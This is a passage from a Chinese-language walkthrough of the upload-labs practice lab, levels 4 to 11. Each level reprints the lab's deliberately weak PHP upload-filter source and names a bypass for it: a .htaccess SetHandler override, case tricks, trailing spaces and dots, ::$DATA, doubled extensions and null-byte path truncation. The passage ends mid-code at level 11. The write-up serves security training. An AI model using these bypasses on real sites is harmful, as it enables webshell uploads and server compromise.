class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>是黑名单,但几乎过滤了所有有问题的后缀名,除了.htaccess,于是首先上传一个.htaccess内容如下的文件:</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute"><span class="nomarkup">SetHandler</span></span> application/x-httpd-php</span><br></pre></td></tr></table></figure><p>然后随便上传一个后缀都会解析为php</p><h2 id="第5关-大小写"><a href="#第5关-大小写" class="headerlink" title="第5关 大小写"></a>第5关 大小写</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>大小写规则不全,可以使用<code>phP</code>后缀上传突破。</p><h2 id="第6关-空格"><a href="#第6关-空格" class="headerlink" title="第6关 空格"></a>第6关 空格</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file,$img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件不允许上传'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>利用Windows系统的文件名特性。文件名最后增加<strong>空格</strong></p><h2 id="第7关-点"><a href="#第7关-点" class="headerlink" title="第7关 点"></a>第7关 点</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>没有删除结尾的“.”,利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过</p><h2 id="第8关-DATA"><a href="#第8关-DATA" class="headerlink" title="第8关 DATA"></a>第8关 DATA</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.date(<span class="string">"YmdHis"</span>).rand(<span class="number">1000</span>,<span class="number">9999</span>).$file_ext;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>还是黑名单,但是没有对后缀名进行去<code>::$DATA</code>处理,利用windows特性,可在后缀名中加<code>::$DATA</code>绕过:</p><h2 id="第9关-点-空格-点"><a href="#第9关-点-空格-点" class="headerlink" title="第9关 点+空格+点"></a>第9关 点+空格+点</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">".php"</span>,<span class="string">".php5"</span>,<span class="string">".php4"</span>,<span class="string">".php3"</span>,<span class="string">".php2"</span>,<span class="string">".html"</span>,<span class="string">".htm"</span>,<span class="string">".phtml"</span>,<span class="string">".pht"</span>,<span class="string">".pHp"</span>,<span class="string">".pHp5"</span>,<span class="string">".pHp4"</span>,<span class="string">".pHp3"</span>,<span class="string">".pHp2"</span>,<span class="string">".Html"</span>,<span class="string">".Htm"</span>,<span class="string">".pHtml"</span>,<span class="string">".jsp"</span>,<span class="string">".jspa"</span>,<span class="string">".jspx"</span>,<span class="string">".jsw"</span>,<span class="string">".jsv"</span>,<span class="string">".jspf"</span>,<span class="string">".jtml"</span>,<span class="string">".jSp"</span>,<span class="string">".jSpx"</span>,<span class="string">".jSpa"</span>,<span class="string">".jSw"</span>,<span class="string">".jSv"</span>,<span class="string">".jSpf"</span>,<span class="string">".jHtml"</span>,<span class="string">".asp"</span>,<span class="string">".aspx"</span>,<span class="string">".asa"</span>,<span class="string">".asax"</span>,<span class="string">".ascx"</span>,<span class="string">".ashx"</span>,<span class="string">".asmx"</span>,<span class="string">".cer"</span>,<span class="string">".aSp"</span>,<span class="string">".aSpx"</span>,<span class="string">".aSa"</span>,<span class="string">".aSax"</span>,<span class="string">".aScx"</span>,<span class="string">".aShx"</span>,<span class="string">".aSmx"</span>,<span class="string">".cEr"</span>,<span class="string">".sWf"</span>,<span class="string">".swf"</span>,<span class="string">".htaccess"</span>);</span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = deldot($file_name);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"> $file_ext = strrchr($file_name, <span class="string">'.'</span>);</span><br><span class="line"> $file_ext = strtolower($file_ext); <span class="comment">//转换为小写</span></span><br><span class="line"> $file_ext = str_ireplace(<span class="string">'::$DATA'</span>, <span class="string">''</span>, $file_ext);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"> $file_ext = trim($file_ext); <span class="comment">//首尾去空</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!in_array($file_ext, $deny_ext)) {</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'此文件类型不允许上传!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>黑名单过滤,注意下面这行和之前不太一样,路径拼接的是处理后的文件名:</p><figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">$im</span>g_path = UPLOAD_PATH.<span class="string">'/'</span>.<span class="symbol">$file</span>_name;</span><br></pre></td></tr></table></figure><p>原理同Pass-06,上传文件名后加上<strong>点+空格+点</strong></p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span>.<span class="bash">php. .</span></span><br></pre></td></tr></table></figure><h2 id="第10关-嵌套绕过"><a href="#第10关-嵌套绕过" class="headerlink" title="第10关 嵌套绕过"></a>第10关 嵌套绕过</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (file_exists(UPLOAD_PATH)) {</span><br><span class="line"> $deny_ext = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> $file_name = trim($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> $file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$file_name; </span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file($temp_file, $img_path)) {</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>只是的删除:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_name = str_ireplace($deny_ext,<span class="string">""</span>, $file_name);</span><br></pre></td></tr></table></figure><p>以利用双写(嵌套)绕过</p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span>.<span class="bash">pphphp</span></span><br></pre></td></tr></table></figure><h2 id="第11关-GET型00截断"><a href="#第11关-GET型00截断" class="headerlink" title="第11关 GET型00截断"></a>第11关 GET型00截断</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_GET[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>白名单判断,但是$img_path直接拼接:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_GET[<span class="string">'save_path'</span>].<span 